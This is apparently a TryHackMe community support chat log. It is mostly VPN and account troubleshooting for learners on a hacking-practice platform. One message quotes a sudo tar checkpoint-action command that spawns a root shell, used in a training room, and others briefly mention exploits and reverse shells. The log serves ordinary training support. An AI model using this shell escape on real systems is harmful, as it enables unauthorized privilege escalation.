Remind me to message you about that, I've had a few funky emails that I think are somewhat related to that

is there a powerful entity in the upper management that could tell me why tryhackme webpages are loading SUPER slow? For example, i'm vpn'ed in and 10.10.10.10 has not loaded in, and it's been 7 minutes already :?

send screenshot of you openvpn output?

hmmmm

i'm not smart enough to see anything wrong

your internet connection is fine?

I remember couple months back I did not had this issue

try to get a vpn file from a server more near your place

!vpnscript

try to run this

aside from these thing, i don't know what you can do

yea, my internet is fine. Also Ninja told me to run the troubleshooting script and it showed that everything is fine ;d

Sorry, I found the issue. I was connect to NordVPN on my main machine and for some reason it made web traffic to tryhackme network very slow

DEPRECATED OPTION: --cipher set to 'AES-256-CBC' but missing in --data-ciphers (AES-256-GCM:AES-128-GCM). Future OpenVPN version will ignore --cipher for cipher negotiations. Add 'AES-256-CBC' to --data-ciphers or change --cipher 'AES-256-CBC' to --data-ciphers-fallback 'AES-256-CBC' to silence this warning.

do you know what is this ?

hello support :D. cannot download the throwback vpn config ... get the 4040 page at the moment. normal vpn config works fine

anyone else this specific problem?

Regenerate config?

100% completed the room, but it shows not completed?

Hello

I m doing room Agent sudo

There he is asking to change the user agent to codename but after changing the user name

I m still not getting anything

😐what should I do?

Hello any one know about honeypots? i have some thoughts to clear although i have done my little research about it but still i am confused to take decision.

@meager oyster not related to the site please ask in #general

hi there i need help related to my router configuration, because when i tried to switch network it worked and when i use my ISP internet direct to my pc not from the router it worked

so the source root of the problem is my router

so is there anything i can set in my router so it might work

@torn citrus

Hi .. I have successfully connected via openvpn on my Kali linux machine, have deployed a machine in "Linux walk Through" room. how can access this machine. when I type the machine IP address in browser.. it is giving error.. Unable to connect

Firefox can’t establish a connection to the server at x.x.x.x

@sharp bison

You need to ssh in this machine

The tasks tell you how to do that

(also, i think that the bot won't reply anytime soon to you)

it is installed

There are some machines that doesn't run a webserver

So you can't access those in the browser

Follow the tasks, they will tell you how to ssh in it

ssh required userid & password..
what would be that

The room tells you the username and the password

Just search around a bit if you haven't seen it

ok..Thanks.. let me look for it

this is the wrong channel try #infosec-general

@barren birch

can

someone help?

I cant connect to tryhackme vpn

what error do you get

this one let me send you

when i give this command

sudo openvpn /path/to/file.ovpn

Options error: In [CMD-LINE]:1: Error opening configuration file: /path/to/file.ovpn
Use --help for more information.

appears this

could you show a screenshot?

ues

That means your path is incorrect

Because you have not changed it from the example

You need to provide a file path to your VPN config, that will depend on where you saved it

how?

Well, where did you put the file?

/path/to/file.ovpn needs to be the path to where you put the config file

downloads

I just clicked save

into the file

Srlups.ovpn

Are you using a virtual machine?

yes

Ok, and did you download the file in your VM or on your Host OS?

in the vm

You need to replace /path/to/file.ovpn

With the path to the file

/home/PutYourKaliUsernameHere/Downloads/WhateverYouCalledTheFile.ovpn

how?

oh ok

thanks

let me try

Thu Nov 26 09:46:45 2020 OpenVPN 2.4.9 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] built on Apr 21 2020
Thu Nov 26 09:46:45 2020 library versions: OpenSSL 1.1.1g 21 Apr 2020, LZO 2.10
Thu Nov 26 09:46:45 2020 OpenSSL: error:0909006C:PEM routines:get_name:no start line
Thu Nov 26 09:46:45 2020 OpenSSL: error:140AD009:SSL routines:SSL_CTX_use_certificate_file:PEM lib
Thu Nov 26 09:46:45 2020 Cannot load inline certificate file
Thu Nov 26 09:46:45 2020 Exiting due to fatal error

@eager fulcrum

Go to tryhackme, to the access page

Click regenerate

Wait 30-60 seconds

Download the new config file and overwrite the old one

Try again

ok

Segmentation fault

that appeared

when I gave the command again

@eager fulcrum

Screenshot

ok

wait

ill try again

and if appears same error

I send a screenshot

@eager fulcrum

it has go

thankss so much

Please don't call me bro, it's uncomfortable seeing as you don't know me

But I'm glad it's working

oh

sorry

yeah I'm happy too

stupid question but.. how do I upload an avatar on THM website?

I get the error "Select an image file to upload your avatar!"

have an image locally on your computer to select as your image

I have that

in a .jpg format

click the avatar (or lack thereof) on your profile

yup, and then I select the file, and I get the image. Doesn't upload. I've turned off ublock and adblocks and all

what happens

nothing?

i think it specifies the size the image has to be, etc

I get the error "Select an image file to upload your avatar!"

I don't see any specifications, not size nor file type

uh

@warm spear do you handle this now, idk

OWASP Juice Shop is really bad for timing out unless i use an attackbox but then I have to use an attackbox which really sucks in my experience, slow and not good for people used to using keyboard shortcuts.. It is a real shame, I am connected to the premium vpn but it will timeout very early on

You're most likely running multiple vpns if you're experiencing connection issues

Maybe, i check with ps and i took a break and did a different challenge that worked

!multivpn

You should also be able to RDP or VNC into the attackbox

If you're a free user, the free attackbox spawns with a lot fewer resources

Im a premium user but thanks a ton for the heads up, that is exactly what I will do!

How to change my username??

Email support@tryhackme.com

Ok, thanks

any ideas what I can do about my website avatar issue?

What issue?

No 😦

Idk who to ask then 😅

I cannot upload an avatar to the webpage.

On tryhackme profile?

yup

So, what is the issue? Are you using jpg or what?

yes, am I not allowed to do that? @placid mango

ah.. I changed the file type to png and it worked.. Did not say anywhere on the site that I must use png

can someone help me please. i am looking to have all my progress reset so that i can start again, i have taken a few months off and want to restart my progress! i signed up to another account and subscribed but i used paypal like an idiot so it subbed to my account that had done a load of rooms

You're best divulging to support@tryhackme.com (: be sure to include your THM username, receipts etc 😄

thanks, i will drop them an email. i dont suppose a lot of people want to redo rooms etc but i think the ability to reset them would be great to refresh memory

Hi guys! I have a little problem with the vpn. I can't connect to the server but the thmUI says I'm connected. I made a new file but still I can't connect and the thmUi says I'm disconnected. Could someone help me?

You're not connected to the VPN on the left hand screen

yes i know its ran into fatal error as you can see but I don't know why

I made a new file. I thought it's will be okay but it isn't

Is it a VM or what?

It looks like you're missing the tun module

https://superuser.com/questions/497245/how-to-load-tun-module-in-linux

@modest cedar did you get this solved.

Not

thmUI still say I'm connected but the openvpn run into fatla error

It looks like you're missing the tun module

okay, thanks but this question is required more time on google

Hey, I am doing Blue room, but exploit that is supposed to use there doesnt work for me, may you help me? Thanks

@modest cedar You haven't created a VPN have you with the config file, top right under network. Just wondering if you've created a VPN connection and got that running whilst also running it in the terminal.

Yes I did it

@hollow magnet Do not use the network manager

it's horrifically broken and adds incorrect routes

Correct

I scrapped that and just deleted the VPN connection and Sudo openvpn instead and it worked.

They seem to be missing the kernel module

LHOST is wrong

@modest cedar Delete that VPN connection in network manager

Module is also wrong @unborn cape

@mortal barn And just "Sudo openvpn file.ovpn" see how you go.

The thm is an alias for it as you can see it

Load the kernel module like the stack overflow post suggests

I'll do it tomorrow

Thanks for everything

@WoLfY no worries.

My streak was reset even though I answered some questions and my history isn’t empty, can someone help me?

There is a 24 hours timer, everytime you answer a question the timer is reset back to 24 hours and you have to answer a question again before 24 hours are over. So, you can still loose you streak if your answer every day but the last answer was more than 24 hours ago

That’s probably it then, thanks

Is there any way to reset machine and root is again?

You can redeploy the machine. Or you mean resetting room progress?

Resetting

Ask the room creator to reset it or send mail to hello@tryhackme.com with your username.

@placid mango no I don't want to reset it actually ! I thought there might be a way! To reset it by myself

But can you tell me why shodan room is private?@placid mango

Things keep changing and breaking room iirc that's why it has made private.

Okay❤️🙏🏻

Hello i need urgent support with my streak

who can i reach out to urgently

Anyone here?

@potent flicker do you need help with your streak?

yes

@celest sapphire yes

i'd suggest emailing support (support@tryhackme.com)

ok ill do that

@celest sapphire idk why my 25 days streak gone even after 24hours haven't completed

24 since last question or 24 hours from previous day

because if you're counting days it doesn't work that way

hey

i have a problem

i can not see images

can someone help me?

What image?

In a particular room, or in all of them

Like that

Same on my pc

Can you view Imgur links normally?

is there any logout from all devices in thm?

I don't think so. But changing your password would do that I guess

this happened just now

works fine for me, try ctrl+shift+r

now it works

nope it does not log you out

hi guys , is there any issues with the vpn server for the throwback network ? i keep gettings disconnected

hi, i'm trying to install enum4linux in the tryhackme Attack Box using the command 'apt-get install enum4linux' but i failed.
Here is the output:
apt-get install enum4linux
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package enum4linux

Can anyone help me?

It's already installed

It's a perl script

enum4linux.pl

Use find or locate

i found it thank you very much:)

any ways to be able to have a vpn up for both my windows machine and Kali at the same time ?

I have a problem, if anyone could help me that would be good

@naive dust How do we know if we can help you if we don't know what the problem is?

Can I DM you? I have a screenshot

What is it about?

My PuTTY isn't working

Ok, there's no reason at all that that needs to be a DM

A connection timed out error

Connect to the VPN.

Sorry, just asked in case I have to share the SS

You can post screenshots here.

That would expose my test machine's IP

here it is anyways

Thanks for the help @eager fulcrum

@naive dust has the issue been sorted?

Just connecting to the VPN

Okay awesome

Those are temporary and not sensitive information

LOL, Yes

I can't see anything in the config file...is it like that?

I've downloaded this one

Help required

No.

Those are putty binaries

!vpn

Follow this room

Oh, wrong webpage ss sent, I've downloaded the OVPN btw

The what?

Please try to be precise

I am saying that I've downloaded the VPN and need a .ovpn file to import

and the directory where the Read Me file is suggesting to, is empty

That comes from the access page as the VPN room tells you

Did you skip the welcome room?

No?

So you should have already connected to the VPN

No, I don't have any option

I think I found the problelm

If you followed the welcome room or the VPN room that I linked, it walks you through the steps

There's a solution for that pinned.

I don't have the config file

There's a solution for that pinned.

Yes, checking

Got the config file

The GUI file is open in my laptop but the icon isn't showing up now

What do you mean?

I've got to go, I'm sure someone else can help you

wait, it was running in the background, closed it and then imported the config file

Thanks for the help tho

It usually gets tucked up in the system tray on windows @naive dust

GL with the exam! @eager fulcrum

You got it

I'm connected now, thanks

Just finished the "Bounty Hacker" room with a bit of help from auntie Google.
Can someone walk me through why this command works?
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

Look at the tar manual pages. It’s built in to tar. Also please use the proper channel

Hi, I was just wondering is openvpn safe?

yes

for the purposes of THM and HTB and other ethical hacking sites, all it does is add a route to your IP table so you're able to get on to the private network of the site @proper moat

Ohh ok

Thank you very much.

np

can anyone teach me how to use SCP command? I can't get it..

wrong channel for that question. #general #infosec-general

oh okay

and that's also quite google-able

I am googling it for the past 1 hour

cannot get it

wrong channel for that question. #general #infosec-general

yes I know

OpenVPN should be opened on my regular workspace, not the virtual machine. Correct?

Nope

Run it in the VM

Otherwise you'll have trouble with reverse shells and stuff

Although it depends if you're talking about the target machines or attackbox or your own VM on your machine